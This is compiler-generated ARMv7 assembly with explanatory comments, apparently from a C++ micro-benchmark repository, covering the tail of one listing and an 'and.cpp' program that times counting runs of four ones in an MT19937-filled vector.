.Lset13 = .Ltmp13-.Leh_func_begin1 @ >> Call Site 6 <<
.long .Lset13
.Lset14 = .Leh_func_end1-.Ltmp13 @ Call between .Ltmp13 and .Leh_func_end1
.long .Lset14
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.align 2
.fnend
.section .text._ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,"axG",%progbits,_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,comdat
.weak _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.align 2
.type _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,%function
_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE: @ @_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.fnstart
.Leh_func_begin2:
@ BB#0:
.save {r4, r5, r6, r7, r8, r9, r11, lr}
push {r4, r5, r6, r7, r8, r9, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
mov r9, r2
mov r5, r1
ldm r9, {r0, r1}
sub r0, r1, r0
cmn r0, #1
beq .LBB2_6
@ BB#1:
add r7, r0, #1
mvn r0, #0
mov r1, r7
bl __aeabi_uidiv
mov r8, r0
ldr r1, [r5, #2496]
mul r7, r8, r7
movw r6, #22144
movw r4, #0
movt r6, #40236
movt r4, #61382
.LBB2_2: @ =>This Inner Loop Header: Depth=1
cmp r1, #624
blo .LBB2_4
@ BB#3: @ in Loop: Header=BB2_2 Depth=1
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r1, [r5, #2496]
.LBB2_4: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit2
@ in Loop: Header=BB2_2 Depth=1
add r2, r1, #1
str r2, [r5, #2496]
ldr r0, [r5, r1, lsl #2]
eor r0, r0, r0, lsr #11
and r1, r6, r0, lsl #7
eor r0, r1, r0
and r1, r4, r0, lsl #15
eor r0, r1, r0
mov r1, r2
eor r0, r0, r0, lsr #18
cmp r0, r7
bhs .LBB2_2
@ BB#5:
mov r1, r8
bl __aeabi_uidiv
b .LBB2_9
.LBB2_6:
ldr r0, [r5, #2496]
cmp r0, #624
blo .LBB2_8
@ BB#7:
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r0, [r5, #2496]
.LBB2_8: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit
add r1, r0, #1
str r1, [r5, #2496]
ldr r0, [r5, r0, lsl #2]
movw r1, #22144
movt r1, #40236
eor r0, r0, r0, lsr #11
and r1, r1, r0, lsl #7
eor r0, r1, r0
movw r1, #0
movt r1, #61382
and r1, r1, r0, lsl #15
eor r0, r1, r0
eor r0, r0, r0, lsr #18
.LBB2_9:
ldr r1, [r9]
add r0, r1, r0
pop {r4, r5, r6, r7, r8, r9, r11, pc}
.Ltmp16:
.size _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE, .Ltmp16-_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.cantunwind
.fnend
.section .text._ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,"axG",%progbits,_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,comdat
.weak _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.align 2
.type _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,%function
_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv: @ @_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.fnstart
.Leh_func_begin3:
@ BB#0:
.save {r4, r5, r11, lr}
push {r4, r5, r11, lr}
ldr lr, [r0]
movw r12, #45279
mov r2, #0
movt r12, #39176
.LBB3_1: @ =>This Inner Loop Header: Depth=1
add r1, r0, r2
ldr r3, [r1, #4]
ldr r5, [r1, #1588]
and r1, lr, #-2147483648
bic r4, r3, #-2147483647
tst r3, #1
orr r1, r4, r1
mov lr, r3
eor r1, r5, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, r2]
add r2, r2, #4
cmp r2, #908
bne .LBB3_1
@ BB#2: @ %.preheader
ldr r4, [r0, #908]
mov r2, #0
.LBB3_3: @ =>This Inner Loop Header: Depth=1
rsb r1, r2, #0
mov r5, r0
and r4, r4, #-2147483648
sub r2, r2, #1
ldr lr, [r5, r1, lsl #2]!
ldr r3, [r5, #912]
bic r1, r3, #-2147483647
tst r3, #1
orr r1, r1, r4
mov r4, r3
eor r1, lr, r1, lsr #1
eorne r1, r1, r12
str r1, [r5, #908]
cmn r2, #396
bne .LBB3_3
@ BB#4:
ldr r1, [r0, #2492]
ldr r2, [r0]
and r1, r1, #-2147483648
ldr r3, [r0, #1584]
bic r5, r2, #-2147483647
tst r2, #1
orr r1, r5, r1
mov r2, #0
eor r1, r3, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, #2492]
str r2, [r0, #2496]
pop {r4, r5, r11, pc}
.Ltmp17:
.size _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv, .Ltmp17-_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.cantunwind
.fnend
.section .text.startup,"ax",%progbits
.align 2
.type _GLOBAL__sub_I_minus_mul_plus_double.cpp,%function
@ Static-initialization thunk for this translation unit: constructs the
@ std::ios_base::Init guard object and registers its destructor with
@ __cxa_atexit.  The registration is a tail call made after lr is restored.
_GLOBAL__sub_I_minus_mul_plus_double.cpp: @ @_GLOBAL__sub_I_minus_mul_plus_double.cpp
.fnstart
.Leh_func_begin4:
@ BB#0:
.save {r4, r10, r11, lr}
push {r4, r10, r11, lr}
.setfp r11, sp, #8
add r11, sp, #8
movw r4, :lower16:_ZStL8__ioinit @ r4 = &__ioinit guard object
movt r4, :upper16:_ZStL8__ioinit
mov r0, r4
bl _ZNSt8ios_base4InitC1Ev @ std::ios_base::Init::Init()
movw r0, :lower16:_ZNSt8ios_base4InitD1Ev @ arg0: destructor to run at exit
movw r2, :lower16:__dso_handle @ arg2: this DSO's handle
movt r0, :upper16:_ZNSt8ios_base4InitD1Ev
movt r2, :upper16:__dso_handle
mov r1, r4 @ arg1: the object itself
pop {r4, r10, r11, lr}
b __cxa_atexit @ tail-call the atexit registration
.Ltmp18:
.size _GLOBAL__sub_I_minus_mul_plus_double.cpp, .Ltmp18-_GLOBAL__sub_I_minus_mul_plus_double.cpp
.Leh_func_end4:
.fnend
@ File-local data for minus_mul_plus_double.cpp: the ios_base::Init guard byte
@ and the three string literals main() prints ("time: ", the label, "\n").
.type _ZStL8__ioinit,%object @ @_ZStL8__ioinit
.local _ZStL8__ioinit
.comm _ZStL8__ioinit,1,1
.type .L.str,%object @ @.str
.section .rodata.str1.1,"aMS",%progbits,1
.L.str:
.asciz "time: "
.size .L.str, 7
.type .L.str1,%object @ @.str1
.L.str1:
.asciz " 1111s: "
@ NOTE(review): the literal above shows 9 bytes incl. NUL, but .size says 10
@ and main passes length 9 to __ostream_insert — the listing most likely lost
@ a space to whitespace collapsing; verify against the original source.
.size .L.str1, 10
.type .L.str2,%object @ @.str2
.L.str2:
.asciz "\n"
.size .L.str2, 2
@ Register the static-init stub so the loader runs it before main().
.section .init_array,"aw",%init_array
.align 2
.long _GLOBAL__sub_I_minus_mul_plus_double.cpp(target1)
.ident "Debian clang version 3.5.0-10 (tags/RELEASE_350/final) (based on LLVM 3.5.0)"
|
akalenuk/wordsandbuttons
| 14,661
|
exp/cpp_and_and/ARMv7/s/and.s
|
.text
.syntax unified
.cpu cortex-a8
.eabi_attribute 6, 10 @ Tag_CPU_arch
.eabi_attribute 7, 65 @ Tag_CPU_arch_profile
.eabi_attribute 8, 1 @ Tag_ARM_ISA_use
.eabi_attribute 9, 2 @ Tag_THUMB_ISA_use
.fpu neon
.eabi_attribute 17, 1 @ Tag_ABI_PCS_GOT_use
.eabi_attribute 20, 1 @ Tag_ABI_FP_denormal
.eabi_attribute 21, 1 @ Tag_ABI_FP_exceptions
.eabi_attribute 23, 3 @ Tag_ABI_FP_number_model
.eabi_attribute 24, 1 @ Tag_ABI_align_needed
.eabi_attribute 25, 1 @ Tag_ABI_align_preserved
.eabi_attribute 28, 1 @ Tag_ABI_VFP_args
.eabi_attribute 18, 4 @ Tag_ABI_PCS_wchar_t
.eabi_attribute 26, 2 @ Tag_ABI_enum_size
.eabi_attribute 68, 1 @ Tag_Virtualization_use
.file "and.cpp"
.globl main
.align 3
@ -----------------------------------------------------------------------------
@ int main()  —  and.cpp benchmark.
@ Seeds an on-stack MT19937 engine, fills a 16M-element int vector with
@ uniform_int_distribution<int>{0,1} draws, then times a scan that counts how
@ many positions i have a[i]==1 && a[i+1]==1 && a[i+2]==1 && a[i+3]==1, and
@ prints "time: <seconds> <label> <count>\n".
@ Frame (sp-relative after both .pad adjustments, 2536 bytes + saved regs):
@   [sp,#32..]  mt19937 engine (624-word state; index at [sp,#2528])
@   [sp,#24/28] uniform_int_distribution param {a=0, b=1}
@   [sp,#20]    window counter
@   [sp,#0/#8]  chrono::system_clock::now() results (64-bit tick counts)
@ r4 = heap buffer from operator new; r8 = its size, 64,000,000 bytes.
@ -----------------------------------------------------------------------------
.type main,%function
main: @ @main
.fnstart
.Leh_func_begin0:
@ BB#0:
.save {r4, r5, r6, r7, r8, r10, r11, lr}
push {r4, r5, r6, r7, r8, r10, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
.pad #488
sub sp, sp, #488
.pad #2048
sub sp, sp, #2048
movw r2, #35173 @ r2 = 1812433253 (MT19937 init multiplier) ...
add r3, sp, #32
mov r0, #0
mov r1, #1
movt r2, #27655 @ ... high half: 0x6C07
str r0, [sp, #32] @ state[0] = 0 (seed)
.LBB0_1: @ =>This Inner Loop Header: Depth=1
eor r0, r0, r0, lsr #30 @ state[i] = (prev ^ (prev>>30)) * 1812433253 + i
mla r0, r0, r2, r1
str r0, [r3, r1, lsl #2]
add r1, r1, #1
cmp r1, #624
bne .LBB0_1
@ BB#2: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEC2Ej.exit
mov r0, #624
mov r5, #0
str r0, [sp, #2528] @ index = 624: force _M_gen_rand on first draw
mov r0, #1
str r5, [sp, #24] @ param.a = 0
str r0, [sp, #28] @ param.b = 1
.Ltmp0:
movw r8, #36864 @ r8 = 64,000,000 bytes (16,000,000 ints) ...
movt r8, #976 @ ... high half
mov r0, r8
bl _Znwj @ operator new(64000000); may throw -> .Ltmp2 cleanup
mov r4, r0
.Ltmp1:
@ BB#3: @ %.lr.ph
mov r0, r4
mov r1, r8
mov r2, #0
bl __aeabi_memset @ note AEABI arg order: (dest, n, value)
add r6, sp, #32
add r7, sp, #24
.LBB0_4: @ =>This Inner Loop Header: Depth=1
mov r0, r7
mov r1, r6
mov r2, r7
bl _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
str r0, [r4, r5]
add r5, r5, #4
cmp r5, r8
bne .LBB0_4
@ BB#5: @ %._crit_edge
add r0, sp, #8
mov r5, #0
str r5, [sp, #20] @ counter = 0
bl _ZNSt6chrono3_V212system_clock3nowEv @ t0 -> [sp,#8]
movw r0, #36852 @ loop bound = 64,000,000 - 12 (last 4-int window) ...
movt r0, #976
.LBB0_6: @ =>This Inner Loop Header: Depth=1
mov r1, r4
ldr r2, [r1, r5]! @ r2 = a[i]; r1 -> &a[i]
cmp r2, #1
bne .LBB0_9
@ BB#7: @ in Loop: Header=BB0_6 Depth=1
ldr r2, [r1, #4]
cmp r2, #1
ldreq r2, [r1, #8] @ short-circuit folded into conditional loads
cmpeq r2, #1
bne .LBB0_9
@ BB#8: @ in Loop: Header=BB0_6 Depth=1
ldr r1, [r1, #12]
cmp r1, #1
ldreq r1, [sp, #20] @ all four == 1: ++counter
addeq r1, r1, #1
streq r1, [sp, #20]
.LBB0_9: @ %.backedge
@ in Loop: Header=BB0_6 Depth=1
add r5, r5, #4
cmp r5, r0
bne .LBB0_6
@ BB#10:
mov r0, sp
bl _ZNSt6chrono3_V212system_clock3nowEv @ t1 -> [sp,#0]
.Ltmp3:
movw r0, :lower16:_ZSt4cout
movw r1, :lower16:.L.str
movt r0, :upper16:_ZSt4cout
movt r1, :upper16:.L.str
mov r2, #6
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp4:
@ BB#11:
ldr r0, [sp, #8]
ldr r1, [sp, #12]
ldm sp, {r2, r3}
subs r0, r2, r0 @ 64-bit t1 - t0
sbc r1, r3, r1
bl __aeabi_l2d
vldr d16, .LCPI0_0 @ 1e-9: ticks (ns) -> seconds
vmov d17, r0, r1
vmul.f64 d0, d17, d16
.Ltmp5:
movw r0, :lower16:_ZSt4cout
movt r0, :upper16:_ZSt4cout
bl _ZNSo9_M_insertIdEERSoT_
mov r5, r0
.Ltmp6:
@ BB#12: @ %_ZNSolsEd.exit
.Ltmp7:
movw r1, :lower16:.L.str1
mov r0, r5
movt r1, :upper16:.L.str1
mov r2, #9
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp8:
@ BB#13: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit2
ldr r1, [sp, #20]
.Ltmp9:
mov r0, r5
bl _ZNSo9_M_insertImEERSoT_ @ print the window count
.Ltmp10:
@ BB#14: @ %_ZNSolsEj.exit
.Ltmp11:
movw r1, :lower16:.L.str2
mov r2, #1
movt r1, :upper16:.L.str2
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp12:
@ BB#15: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit
cmp r4, #0
beq .LBB0_17
@ BB#16:
mov r0, r4
bl _ZdlPv @ operator delete(buffer)
.LBB0_17: @ %_ZNSt6vectorIiSaIiEED2Ev.exit
mov r0, #0
sub sp, r11, #24
pop {r4, r5, r6, r7, r8, r10, r11, pc}
@ Landing pads (cleanup only): free the buffer if it was allocated, resume.
.LBB0_18:
.Ltmp13:
mov r5, r0
cmp r4, #0
beq .LBB0_21
@ BB#19:
mov r0, r4
bl _ZdlPv
mov r0, r5
bl _Unwind_Resume
.LBB0_20:
.Ltmp2:
mov r5, r0
.LBB0_21: @ %_ZNSt6vectorIiSaIiEED2Ev.exit4
mov r0, r5
bl _Unwind_Resume
.align 3
@ BB#22:
.LCPI0_0:
.long 3894859413 @ double 1.0000000000000001E-9
.long 1041313291
.Ltmp14:
.size main, .Ltmp14-main
.Leh_func_end0:
.globl __gxx_personality_v0
.personality __gxx_personality_v0
@ LSDA: pure-cleanup call-site table matching the .Ltmp* ranges above.
.handlerdata
.align 2
GCC_except_table0:
.Lexception0:
.byte 255 @ @LPStart Encoding = omit
.byte 0 @ @TType Encoding = absptr
.asciz "\320" @ @TType base offset
.byte 3 @ Call site Encoding = udata4
.byte 78 @ Call site table length
.Lset0 = .Ltmp0-.Leh_func_begin0 @ >> Call Site 1 <<
.long .Lset0
.Lset1 = .Ltmp1-.Ltmp0 @ Call between .Ltmp0 and .Ltmp1
.long .Lset1
.Lset2 = .Ltmp2-.Leh_func_begin0 @ jumps to .Ltmp2
.long .Lset2
.byte 0 @ On action: cleanup
.Lset3 = .Ltmp1-.Leh_func_begin0 @ >> Call Site 2 <<
.long .Lset3
.Lset4 = .Ltmp3-.Ltmp1 @ Call between .Ltmp1 and .Ltmp3
.long .Lset4
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset5 = .Ltmp3-.Leh_func_begin0 @ >> Call Site 3 <<
.long .Lset5
.Lset6 = .Ltmp4-.Ltmp3 @ Call between .Ltmp3 and .Ltmp4
.long .Lset6
.Lset7 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset7
.byte 0 @ On action: cleanup
.Lset8 = .Ltmp4-.Leh_func_begin0 @ >> Call Site 4 <<
.long .Lset8
.Lset9 = .Ltmp5-.Ltmp4 @ Call between .Ltmp4 and .Ltmp5
.long .Lset9
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset10 = .Ltmp5-.Leh_func_begin0 @ >> Call Site 5 <<
.long .Lset10
.Lset11 = .Ltmp12-.Ltmp5 @ Call between .Ltmp5 and .Ltmp12
.long .Lset11
.Lset12 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset12
.byte 0 @ On action: cleanup
.Lset13 = .Ltmp12-.Leh_func_begin0 @ >> Call Site 6 <<
.long .Lset13
.Lset14 = .Leh_func_end0-.Ltmp12 @ Call between .Ltmp12 and .Leh_func_end0
.long .Lset14
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.align 2
.fnend
.section .text._ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,"axG",%progbits,_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,comdat
.weak _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.align 2
@ -----------------------------------------------------------------------------
@ int std::uniform_int_distribution<int>::operator()(mt19937&, const param_type&)
@ In:  r0 = this (unused), r1 = engine -> r5, r2 = param {a, b} -> r9.
@ range = b - a.  If range == 0xFFFFFFFF (cmn #1) any tempered draw is used
@ directly; otherwise rejection sampling:
@     scale = 0xFFFFFFFF / (range+1);  limit = scale * (range+1);
@     draw x until x < limit;  result = a + x / scale.
@ MT19937 tempering on each raw word x:
@     x ^= x>>11;  x ^= (x<<7) & 0x9D2C5680;  x ^= (x<<15) & 0xEFC60000;
@     x ^= x>>18.
@ The engine's word index lives at [engine,#2496]; when it reaches 624,
@ _M_gen_rand refills the state.  Clobbers per AAPCS; no EH (.cantunwind).
@ -----------------------------------------------------------------------------
.type _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,%function
_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE: @ @_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.fnstart
.Leh_func_begin1:
@ BB#0:
.save {r4, r5, r6, r7, r8, r9, r11, lr}
push {r4, r5, r6, r7, r8, r9, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
mov r9, r2
mov r5, r1
ldm r9, {r0, r1} @ r0 = a, r1 = b
sub r0, r1, r0 @ range = b - a
cmn r0, #1 @ full 32-bit range?
beq .LBB1_6
@ BB#1:
add r7, r0, #1
mvn r0, #0
mov r1, r7
bl __aeabi_uidiv @ scale = 0xFFFFFFFF / (range+1)
mov r8, r0
ldr r1, [r5, #2496]
mul r7, r8, r7 @ limit = scale * (range+1)
movw r6, #22144 @ r6 = 0x9D2C5680 (tempering mask b)
movw r4, #0
movt r6, #40236
movt r4, #61382 @ r4 = 0xEFC60000 (tempering mask c)
.LBB1_2: @ =>This Inner Loop Header: Depth=1
cmp r1, #624
blo .LBB1_4
@ BB#3: @ in Loop: Header=BB1_2 Depth=1
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r1, [r5, #2496]
.LBB1_4: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit2
@ in Loop: Header=BB1_2 Depth=1
add r2, r1, #1
str r2, [r5, #2496] @ consume one state word
ldr r0, [r5, r1, lsl #2]
eor r0, r0, r0, lsr #11
and r1, r6, r0, lsl #7
eor r0, r1, r0
and r1, r4, r0, lsl #15
eor r0, r1, r0
mov r1, r2
eor r0, r0, r0, lsr #18
cmp r0, r7
bhs .LBB1_2 @ x >= limit: reject and redraw
@ BB#5:
mov r1, r8
bl __aeabi_uidiv @ x / scale
b .LBB1_9
.LBB1_6: @ full-range case: one tempered draw, no rejection
ldr r0, [r5, #2496]
cmp r0, #624
blo .LBB1_8
@ BB#7:
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r0, [r5, #2496]
.LBB1_8: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit
add r1, r0, #1
str r1, [r5, #2496]
ldr r0, [r5, r0, lsl #2]
movw r1, #22144
movt r1, #40236
eor r0, r0, r0, lsr #11
and r1, r1, r0, lsl #7
eor r0, r1, r0
movw r1, #0
movt r1, #61382
and r1, r1, r0, lsl #15
eor r0, r1, r0
eor r0, r0, r0, lsr #18
.LBB1_9:
ldr r1, [r9]
add r0, r1, r0 @ result = a + scaled draw
pop {r4, r5, r6, r7, r8, r9, r11, pc}
.Ltmp15:
.size _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE, .Ltmp15-_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.cantunwind
.fnend
.section .text._ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,"axG",%progbits,_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,comdat
.weak _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.align 2
@ -----------------------------------------------------------------------------
@ MT19937 _M_gen_rand() (COMDAT copy; identical to the other instantiations).
@ In:  r0 = engine; 624-word state at offset 0, word index at #2496.
@ Rewrites every state word with the twist
@     y = (s[i] & 0x80000000) | (s[i+1] & 0x7FFFFFFF)
@     s[i] = s[(i+397) % 624] ^ (y>>1) ^ (y&1 ? 0x9908B0DF : 0)
@ then zeroes the index.  Loop 1: offsets 0..904 (partner at +1588);
@ loop 2: wrapped middle range; tail: last word (#2492) vs state[0].
@ -----------------------------------------------------------------------------
.type _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,%function
_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv: @ @_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.fnstart
.Leh_func_begin2:
@ BB#0:
.save {r4, r5, r11, lr}
push {r4, r5, r11, lr}
ldr lr, [r0] @ lr = s[0]
movw r12, #45279 @ r12 = 0x9908B0DF (twist constant)
mov r2, #0
movt r12, #39176
.LBB2_1: @ =>This Inner Loop Header: Depth=1
add r1, r0, r2
ldr r3, [r1, #4] @ s[i+1]
ldr r5, [r1, #1588] @ s[i+397]
and r1, lr, #-2147483648
bic r4, r3, #-2147483647
tst r3, #1
orr r1, r4, r1
mov lr, r3
eor r1, r5, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, r2]
add r2, r2, #4
cmp r2, #908
bne .LBB2_1
@ BB#2: @ %.preheader
ldr r4, [r0, #908]
mov r2, #0
.LBB2_3: @ =>This Inner Loop Header: Depth=1
rsb r1, r2, #0
mov r5, r0
and r4, r4, #-2147483648
sub r2, r2, #1
ldr lr, [r5, r1, lsl #2]! @ wrapped partner s[i+397-624]
ldr r3, [r5, #912]
bic r1, r3, #-2147483647
tst r3, #1
orr r1, r1, r4
mov r4, r3
eor r1, lr, r1, lsr #1
eorne r1, r1, r12
str r1, [r5, #908]
cmn r2, #396
bne .LBB2_3
@ BB#4:
ldr r1, [r0, #2492] @ last word
ldr r2, [r0]
and r1, r1, #-2147483648
ldr r3, [r0, #1584]
bic r5, r2, #-2147483647
tst r2, #1
orr r1, r5, r1
mov r2, #0
eor r1, r3, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, #2492]
str r2, [r0, #2496] @ reset index
pop {r4, r5, r11, pc}
.Ltmp16:
.size _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv, .Ltmp16-_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.cantunwind
.fnend
.section .text.startup,"ax",%progbits
.align 2
@ Static-initialization stub: constructs the file-local std::ios_base::Init
@ guard and registers its destructor with __cxa_atexit(dtor, &_ZStL8__ioinit,
@ &__dso_handle).  lr is restored before the branch, so __cxa_atexit returns
@ directly to the .init_array caller (tail call).
